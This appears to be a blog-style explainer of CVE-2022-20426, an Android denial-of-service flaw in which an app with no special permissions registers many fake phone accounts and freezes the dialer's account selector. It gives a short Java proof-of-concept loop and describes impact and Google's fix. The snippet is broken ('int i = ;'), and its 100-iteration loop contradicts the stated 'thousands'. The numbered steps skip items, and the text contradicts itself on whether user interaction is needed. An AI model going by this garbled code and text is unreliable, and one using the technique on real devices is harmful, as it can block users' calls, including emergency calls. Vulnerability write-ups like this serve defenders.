CVE-2022-20426 - Exploiting Android Phone Account Selection via Resource Exhaustion

When talking about Android security, resource exhaustion bugs can be a silent killer. While they don’t always make headlines like remote code execution or privilege escalation, a well-placed denial-of-service (DoS) can do a lot of harm, especially when it makes essential features like phone call management break. Today, we’ll focus on CVE-2022-20426 — a local denial-of-service vulnerability that affects how Android lets users select their preferred phone account to make calls.

This bug affects a huge range of Android versions, from 10 all the way up to the early 13 releases, and is tracked under Android’s own AOSP bug A-236263294.

What’s the Problem?

At a high level, CVE-2022-20426 arises from resource exhaustion in multiple functions and files managing phone accounts. It’s possible for a malicious local app — with NO special permissions — to spam the system with a huge number of fake phone accounts. When this happens, Android’s “choose a phone account” dialog either fails to load, crashes, or takes forever to respond. This leaves users unable to place calls through their intended account. No special execution powers are needed, and it doesn’t require any user interaction to pull off.

To be clear: this is NOT a code execution flaw, but a denial-of-service (DoS). Still, it can be seriously disruptive.

Device types:

All devices using the above OS versions with multi-SIM/phone account support.

Attack Surface

The Android Telephony and Telecom system manages a list of “phone accounts.” When you place a call, especially on dual SIM devices, you might get a pop-up to pick the account you want to use.

Under the hood, apps with appropriate intent capabilities can *register* new phone accounts through Android’s TelecomManager.registerPhoneAccount() API. The OS is supposed to handle a manageable number of these, but what if a malicious app registered thousands of dummy accounts?

Malicious app is installed (no special permissions needed).

2. App registers hundreds or thousands of fake PhoneAccount objects using the public registerPhoneAccount() method.
3. User tries to place a call (by themselves, no user interaction needed for app to trigger the bug).

System tries to render the “select phone account” UI.

5. Resource exhaustion (due to too many registered accounts) causes the UI to freeze, crash, or become unresponsive.

Simple Proof-of-Concept Code Snippet

Below is a simplified example. DO NOT run this on a production device! This registers thousands of dummy phone accounts:

TelecomManager tm = (TelecomManager) context.getSystemService(Context.TELECOM_SERVICE);

for (int i = ; i < 100; i++) {
    PhoneAccountHandle handle = new PhoneAccountHandle(
        new ComponentName(context, MyConnectionService.class),
        "FakeAccount" + i
    );
    PhoneAccount account = PhoneAccount.builder(handle, "FakeAccount" + i)
        .setCapabilities(PhoneAccount.CAPABILITY_CALL_PROVIDER)
        .build();
    tm.registerPhoneAccount(account);
}

Cleanup: You should eventually call tm.unregisterPhoneAccount(handle); for each account, but a malicious app never would.

What Files & Functions Are Affected?

The bug appears across several files that touch the PhoneAccountHandle list and how they are shown in the selector UI. For example:

- com/android/server/telecom/PhoneAccountRegistrar.java

CallsManager.java

These components are responsible for managing and showing available PhoneAccounts. None of them set a practical upper limit for the number of accounts, leading to unbounded resource use.

Impact

- DoS to dialer: Users can’t select a phone account, stall critical calls (including to emergency services).

Local attacker only: No elevated permissions required.

- Persistence: Effect can last until device is rebooted or all fake accounts are unregistered (which won’t happen unless you wipe the app data or uninstall the malicious app).

Original References

- Android Security Bulletin — December 2022
- NVD CVE Page (CVE-2022-20426)
- AOSP Issue Tracker: A-236263294 (restricted access)

Google’s fix (on security patch level Dec-2022 or later for affected Android versions) involves

- Placing a hard upper bound on how many phone accounts each app/user can register.

Limiting the total number of visible phone accounts in the UI.

Device vendors pushed this patch via regular security updates. If you’re on an older Android device without security updates, you could still be at risk.

Summary

CVE-2022-20426 might seem like a minor issue — after all, nobody’s breaking into your device with it. But a DoS like this can really hurt reliability, especially when you need to use your phone fast. Attackers don’t need special permissions or any user interaction, so this is a bug everyone should care about patching.

If you want to learn more, check Google’s official notice here and always keep your OS up to date.

Stay safe—and if you’re curious, always tinker on a safe test device.

*This analysis is exclusively written for you, providing clear and practical insight into a real-world Android vulnerability, with reference links and a working example to show how it works under the hood.*

Timeline

Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 14:48:00 UTC